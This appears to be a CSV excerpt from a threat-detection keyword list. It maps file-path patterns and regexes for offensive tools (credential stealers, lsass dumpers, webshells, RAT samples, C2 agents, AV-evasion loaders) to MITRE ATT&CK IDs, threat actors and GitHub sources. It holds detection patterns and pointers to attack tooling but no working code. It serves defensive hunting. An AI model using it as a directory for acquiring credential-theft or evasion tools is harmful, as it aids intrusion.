"*\AMSITrigger-master*",".{0,1000}\\AMSITrigger\-master.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","N/A","https://www.rythmstick.net/posts/amsitrigger/","10","10","1195","166","2022-08-21T22:37:23Z","2020-05-27T09:17:19Z","13933"
"*\amsiwala.exe*",".{0,1000}\\amsiwala\.exe.{0,1000}","offensive_tool_keyword","ShadowStealer","Google Chrome Passwords , Cookies and SystemInfo Dumper","T1555 - T1539 - T1125 - T1083 - T1056","TA0009 - TA0006 - TA0010","N/A","N/A","Credential Access","https://github.com/xelroth/ShadowStealer","1","0","N/A","N/A","10","","N/A","","","","13934"
"*\Andrew.dmp*",".{0,1000}\\Andrew\.dmp.{0,1000}","offensive_tool_keyword","AndrewSpecial","AndrewSpecial - dumping lsass memory stealthily","T1003.001 - T1055.001","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/hoangprod/AndrewSpecial","1","0","N/A","N/A","10","4","386","98","2019-06-02T02:49:28Z","2019-01-18T19:12:09Z","13935"
"*\AndroRat Binder.exe*",".{0,1000}\\AndroRat\sBinder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","QUILTED TIGER","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13936"
"*\Ani-Shell.php*",".{0,1000}\\Ani\-Shell\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","13938"
"*\Annoying.exe*",".{0,1000}\\Annoying\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13939"
"*\Annoying1.exe*",".{0,1000}\\Annoying1\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13940"
"*\anonymous rat v1.0.exe*",".{0,1000}\\anonymous\srat\sv1\.0\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13941"
"*\Ant Attack.exe*",".{0,1000}\\Ant\sAttack\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","13942"
"*\anti_analysis.exe*",".{0,1000}\\anti_analysis\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13943"
"*\anti_debug.exe*",".{0,1000}\\anti_debug\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13944"
"*\anti_methods\antivm.ps1*",".{0,1000}\\anti_methods\\antivm\.ps1.{0,1000}","offensive_tool_keyword","SomalifuscatorV2","windows batch obfuscator","T1027 - T1497 - T1057","TA0005","N/A","N/A","Defense Evasion","https://github.com/KDot227/SomalifuscatorV2","1","0","N/A","N/A","10","4","315","42","2025-01-19T04:30:49Z","2022-09-23T00:46:51Z","13945"
"*\Antichat Shell v1.3.php*",".{0,1000}\\Antichat\sShell\sv1\.3\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","13946"
"*\antiDefense.cpp*",".{0,1000}\\antiDefense\.cpp.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","0","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","13947"
"*\AntiSandbox.go*",".{0,1000}\\AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goMatrixC2","C2 leveraging Matrix/Element Messaging Platform as Backend to control Implants in goLang.","T1090 - T1027 - T1071","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/n1k7l4i/goMatrixC2","1","0","N/A","N/A","10","","N/A","","","","13948"
"*\AntiSandbox.go*",".{0,1000}\\AntiSandbox\.go.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","N/A","10","","N/A","","","","13949"
"*\AntiTamper.exe*",".{0,1000}\\AntiTamper\.exe.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","13950"
"*\AntSword_*.php*",".{0,1000}\\AntSword_.{0,1000}\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","13951"
"*\AoratosWin*",".{0,1000}\\AoratosWin.{0,1000}","offensive_tool_keyword","AoratosWin","A tool that removes traces of executed applications on Windows OS.","T1070 - T1564","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/PinoyWH1Z/AoratosWin","1","0","N/A","N/A","N/A","2","120","16","2022-09-04T09:15:35Z","2022-09-04T09:04:35Z","13969"
"*\APC_Injection.cpp*",".{0,1000}\\APC_Injection\.cpp.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","13970"
"*\apc_injection.exe*",".{0,1000}\\apc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13971"
"*\APCLdr.*",".{0,1000}\\APCLdr\..{0,1000}","offensive_tool_keyword","APCLdr","APCLdr: Payload Loader With Evasion Features","T1027 - T1055 - T1055.002 - T1055.003 - T1070 - T1070.004 - T1071 - T1106 - T1574.001","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/NUL0x4C/APCLdr","1","0","N/A","N/A","N/A","4","316","54","2023-01-22T04:24:33Z","2023-01-21T18:09:36Z","13972"
"*\api_hooking.exe*",".{0,1000}\\api_hooking\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","13974"
"*\Apollo.exe*",".{0,1000}\\Apollo\.exe.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","13975"
"*\Appdata\*\aloy64.exe*",".{0,1000}\\Appdata\\.{0,1000}\\aloy64\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","13976"
"*\Appdata\*\Beacon.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","13977"
"*\Appdata\*\Beacon01.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon01\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","13978"
"*\Appdata\*\Beacon02.exe*",".{0,1000}\\Appdata\\.{0,1000}\\Beacon02\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","13979"
"*\Appdata\*\kitty.exe*",".{0,1000}\\Appdata\\.{0,1000}\\kitty\.exe.{0,1000}","offensive_tool_keyword","_","suspicious executable names in suspicious paths related to exploitation tools","T1036 - T1204","TA0005 - TA0002","N/A","N/A","Exploitation tool","N/A","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","13980"
"*\AppData\Local\Temp\*\RDP\Result\Pass1.txt*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\RDP\\Result\\Pass1\.txt.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","14005"
"*\AppData\Local\Temp\*\RDP\Result\Pass2.txt*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\RDP\\Result\\Pass2\.txt.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","14006"
"*\AppData\Local\Temp\*\RDP\Result\Pass3.txt*",".{0,1000}\\AppData\\Local\\Temp\\.{0,1000}\\RDP\\Result\\Pass3\.txt.{0,1000}","offensive_tool_keyword","RDP Recognizer","could be used to brute force RDP passwords or check for RDP vulnerabilities","T1110 - T1595.002","TA0006","N/A","BianLian","Credential Access","https://www.virustotal.com/gui/file/74788c34f3606e482ad28752c14550dc469bb0c04fa72e184a1e457613c2e4f6/details","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","14007"
"*\AppData\Local\Temp\Camera.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Camera\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14015"
"*\AppData\Local\Temp\factura.exe*",".{0,1000}\\AppData\\Local\\Temp\\factura\.exe.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","N/A","10","10","712","311","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z","14021"
"*\AppData\Local\Temp\GetLogs.ps1*",".{0,1000}\\AppData\\Local\\Temp\\GetLogs\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14023"
"*\AppData\Local\Temp\KPortScan*",".{0,1000}\\AppData\\Local\\Temp\\KPortScan.{0,1000}","offensive_tool_keyword","KPortScan","port scanner used by attackers","T1046 - T1595","TA0043 - TA0001","N/A","Dispossessor","Reconnaissance","https://github.com/stardust50578/rdp_brute","1","0","N/A","N/A","8","1","2","6","2019-05-19T14:25:06Z","2019-05-19T14:29:49Z","14029"
"*\AppData\Local\Temp\Leaked.txt*",".{0,1000}\\AppData\\Local\\Temp\\Leaked\.txt.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14032"
"*\AppData\Local\Temp\Payload.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Payload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","https://github.com/r00t-3xp10it/redpill","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14037"
"*\AppData\Local\Temp\Screenshot.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Screenshot\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14048"
"*\AppData\Local\Temp\SSIDump.zip*",".{0,1000}\\AppData\\Local\\Temp\\SSIDump\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14049"
"*\AppData\Local\Temp\Start-WebServer..ps1*",".{0,1000}\\AppData\\Local\\Temp\\Start\-WebServer\.\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14050"
"*\AppData\Local\Temp\StartWebServer.ps1*",".{0,1000}\\AppData\\Local\\Temp\\StartWebServer\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14051"
"*\AppData\Local\Temp\tempfile.zip*",".{0,1000}\\AppData\\Local\\Temp\\tempfile\.zip.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","14053"
"*\AppData\Local\Temp\tor --*",".{0,1000}\\AppData\\Local\\Temp\\tor\s\-\-.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","Dispossessor - BlackBasta","Data Exfiltration","torproject.org","1","0","N/A","N/A","9","10","N/A","N/A","N/A","N/A","14054"
"*\AppData\Local\Temp\Upload.ps1*",".{0,1000}\\AppData\\Local\\Temp\\Upload\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14056"
"*\AppData\Local\Temp\webserver.ps1*",".{0,1000}\\AppData\\Local\\Temp\\webserver\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","14062"
"*\AppData\Roaming\Kematian*",".{0,1000}\\AppData\\Roaming\\Kematian.{0,1000}","offensive_tool_keyword","Kematian Stealer","Fake WinRar site distributes malware (+stealer +miner +hvnc +ransomware) from GitHub","T1195 - T1566 - T1569 - T1106 - T1486 - T1113","TA0001 - TA0002 - TA0005 - TA0006 - TA0007 - TA0009 - TA0010 - TA0011 - TA0040 - TA0043","N/A","N/A","Malware","https://github[.]com/sap3r-encrypthub/encrypthub","1","0","N/A","N/A","10","7","N/A","N/A","N/A","N/A","14079"
"*\AppProxyC2.*",".{0,1000}\\AppProxyC2\..{0,1000}","offensive_tool_keyword","AppProxyC2","simple POC to show how to tunnel traffic through Azure Application Proxy","T1090 - T1572 - T1071","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/xpn/AppProxyC2","1","0","N/A","N/A","9","10","69","18","2021-04-21T13:02:15Z","2021-04-21T10:46:16Z","14099"
"*\Aqua Server Editor.exe*",".{0,1000}\\Aqua\sServer\sEditor\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14100"
"*\AquaServer.exe*",".{0,1000}\\AquaServer\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14101"
"*\Aquates Rat.exe*",".{0,1000}\\Aquates\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","14102"
"*\arabicspy.php*",".{0,1000}\\arabicspy\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","14103"
"*\ArgFuscator.zip*",".{0,1000}\\ArgFuscator\.zip.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","N/A","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","14104"
"*\args_spoofing-rs.exe*",".{0,1000}\\args_spoofing\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","0","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","14105"
"*\arsenal-1.1.0.zip*",".{0,1000}\\arsenal\-1\.1\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","14106"
"*\arsenal-1.2.0.zip*",".{0,1000}\\arsenal\-1\.2\.0\.zip.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","N/A","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","14107"
